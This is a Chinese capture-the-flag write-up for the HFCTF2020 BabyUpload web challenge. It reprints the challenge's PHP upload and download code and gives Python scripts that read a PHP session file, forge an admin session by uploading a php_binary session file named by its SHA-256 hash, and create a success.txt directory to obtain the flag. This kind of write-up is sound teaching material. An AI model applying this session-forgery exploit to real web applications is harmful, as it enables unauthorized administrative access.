2020-虎符网络安全赛道-Web-BabyUpload
复现环境:
https://buuoj.cn/challenges#[HFCTF2020]BabyUpload
https://www.ctfhub.com/#/challenge
解题过程:
代码分析
将 session 的保存目录设置为 /var/babyctf/,并且启动 session,同时引入/flag内容。
<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
判断 session 中 username 是否为 admin,是的话判断/var/babyctf/success.txt 是否存在,存在的话就把 success.txt 删了,并显示 flag。
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
}
else{
$_SESSION['username'] ='guest';
}
获取相关参数,均为 POST 参数,direction 表示是上传(upload)还是下载(download)操作,attr 会被直接拼接在 /var/babyctf 这个路径后面,如果 attr 为 private 则把用户名继续拼接在后面。
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
$dir_path .= "/".$_SESSION['username'];
}
上传操作,上传文件的 field 为 up_file,把文件名拼接在后面,同时加上下划线和这个文件内容的 sha256 摘要值(文件是我们上传的,文件内容知道的情况下这个值也是可以在本地算出来的。)
然后判断是否有路径穿越,逐级创建目录,将文件储存到下面上传就结束了。
if($direction === "upload"){
try{
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
throw new RuntimeException('invalid upload');
}
$file_path = $dir_path."/".$_FILES['up_file']['name'];
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
@mkdir($dir_path, 0700, TRUE);
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
$upload_result = "uploaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$upload_result = $e->getMessage();
}
下载操作,获取要读取的文件名(POST filename参数),拼接路径,判断是否有路径穿越,然后将文件内容返回。
} elseif ($direction === "download") {
try{
$filename = basename(filter_input(INPUT_POST, 'filename'));
$file_path = $dir_path."/".$filename;
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
if(!file_exists($file_path)) {
throw new RuntimeException('file not exist');
}
header('Content-Type: application/force-download');
header('Content-Length: '.filesize($file_path));
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
if(readfile($file_path)){
$download_result = "downloaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$download_result = $e->getMessage();
}
exit;
}
?>
所以要读取 Flag,需求就很明确了:
伪造 session 使自己变成 admin -> 创建一个 success.txt 文件 -> 读取 flag。
脚本利用
1.远程读取 session 文件内容
利用if($direction === "upload"){ 这段代码 通过readfile() 函数回显读取结果
然后构造请求来读取这个文件内容
- attr 为空则直接读取 /var/babyctf/ 下的文件
- 文件名则为 sess_PHPSESSID内容,固定格式
def ReadSession():
url = target_url
s = requests.get(url=url)
sses = s.headers['Set-Cookie']
sess = re.findall("PHPSESSID=(.+?); path=/",sses)
# print(sess)
data = {
'attr':'.',
'direction':'download',
'filename':'sess_'+sess[0]
}
r = requests.post(url=url,data=data)
print (r.content[len(s.content):])
出现回显
2.伪造session
我们只需要上传一个名为 sess 的文件,内容为我们伪造的 session 内容(跟进之前读取的guest用户的形式伪造),计算出它的摘要值,然后将 Cookie 中的 PHPSESSID 改为这个 sha256 值,即可成功伪造 session。
参考 https://blog.spoock.com/2016/10/16/php-serialize-problem/
判断其 session 处理器为 php_binary,则使用本地的的 PHP,将其 session 处理器改为 php_binary,然后利用其来生成 session 文件。
注意:不能直接用文本编辑器生成,因为 session 文件前面还有个隐藏字符 08,普通编辑器无法录入这个字符导致操作失败。
def BeAdmin():
# print(BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
files = {
"up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
}
data = {
'attr':'.',
'direction':'upload'
}
url = target_url
r = requests.post(url=url,data=data,files=files)
session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
return session_id
3.然后就是在 /var/babyctf 下创建一个 success.txt 文件。
这里我们看到是用 file_exists 函数判断文件是否存在的。
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
在 PHP 文档中写到这个函数用于判断文件或者目录是否存在。
file_exists
(PHP 4, PHP 5, PHP 7)file_exists — 检查文件或目录是否存在
虽然我们不能完全控制上传的文件名,但上传的路径我们是可以控制的,所以我们只需要在 /var/babyctf/ 下创建一个 success.txt 目录即可。
还记得之前的 attr 参数吗,我们将其改为 success.txt,即可创建一个 success.txt 目录。
def upload_success():
files = {
"up_file": ("test", BytesIO('good job!'.encode('utf-8')))
}
data = {
'attr':'success.txt',
'direction':'upload'
}
url = target_url
r = requests.post(url=url,data=data,files=files)
4.利用PHPSESSID值的admin权限+ 上传成功的success.txt 达到读取flag的条件,成功读取flag。
php_session_id = BeAdmin()
print(php_session_id)
cookies = {
'PHPSESSID':php_session_id
}
url = target_url
s = requests.get(url)
r = requests.get(url=url,cookies=cookies)
print ('Now here is your flag!')
print (r.content[len(s.content):])
